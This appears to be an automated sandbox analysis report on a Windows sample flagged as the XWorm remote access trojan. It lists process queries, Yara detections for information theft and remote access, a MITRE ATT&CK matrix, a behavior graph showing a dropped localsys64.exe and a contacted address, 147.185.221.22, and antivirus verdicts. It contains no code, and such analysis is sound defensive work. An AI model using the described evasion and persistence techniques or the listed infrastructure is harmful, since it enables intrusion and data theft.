                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2y
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeQueries volume information: C:\Users\user\Desktop\fjijTlM2tu.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeQueries volume information: C:\Users\user\AppData\Roaming\localsys64.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeQueries volume information: C:\Users\user\AppData\Roaming\localsys64.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeQueries volume information: C:\Users\user\AppData\Roaming\localsys64.exe VolumeInformation
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: fjijTlM2tu.exe, 00000000.00000002.2937977048.000000001C740000.00000004.00000020.00020000.00000000.sdmp, fjijTlM2tu.exe, 00000000.00000002.2932578473.000000001BADE000.00000004.00000020.00020000.00000000.sdmp, fjijTlM2tu.exe, 00000000.00000002.2932578473.000000001BA30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: fjijTlM2tu.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fjijTlM2tu.exe PID: 6872, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: fjijTlM2tu.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fjijTlM2tu.exe PID: 6872, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		1
                  Input Capture                  		221
                  Security Software Discovery                  		Remote Services1
                  Input Capture                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		21
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell                  		1
                  DLL Side-Loading                  		21
                  Registry Run Keys / Startup Folder                  		131
                  Virtualization/Sandbox Evasion                  		Security Account Manager131
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading                  		12
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1539518 Sample: fjijTlM2tu.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 12 other signatures 2->47 7 fjijTlM2tu.exe 1 6 2->7         started        12 localsys64.exe 2->12         started        14 localsys64.exe 2->14         started        16 localsys64.exe 2->16         started        process3 dnsIp4 39 147.185.221.22, 43768, 49759, 49795 SALSGIVERUS United States 7->39 37 C:\Users\user\AppData\...\localsys64.exe, PE32 7->37 dropped 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->51 53 Protects its processes via BreakOnTermination flag 7->53 55 Bypasses PowerShell execution policy 7->55 63 2 other signatures 7->63 18 powershell.exe 23 7->18         started        21 powershell.exe 23 7->21         started        23 powershell.exe 23 7->23         started        25 2 other processes 7->25 57 Antivirus detection for dropped file 12->57 59 Multi AV Scanner detection for dropped file 12->59 61 Machine Learning detection for dropped file 12->61 file5 signatures6 process7 signatures8 49 Loading BitLocker PowerShell Module 18->49 27 conhost.exe 18->27         started        29 conhost.exe 21->29         started        31 conhost.exe 23->31         started        33 conhost.exe 25->33         started        35 conhost.exe 25->35         started        process9

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  fjijTlM2tu.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                  fjijTlM2tu.exe100%AviraTR/Spy.Gen
                  fjijTlM2tu.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\localsys64.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Roaming\localsys64.exe100%Joe Sandbox ML
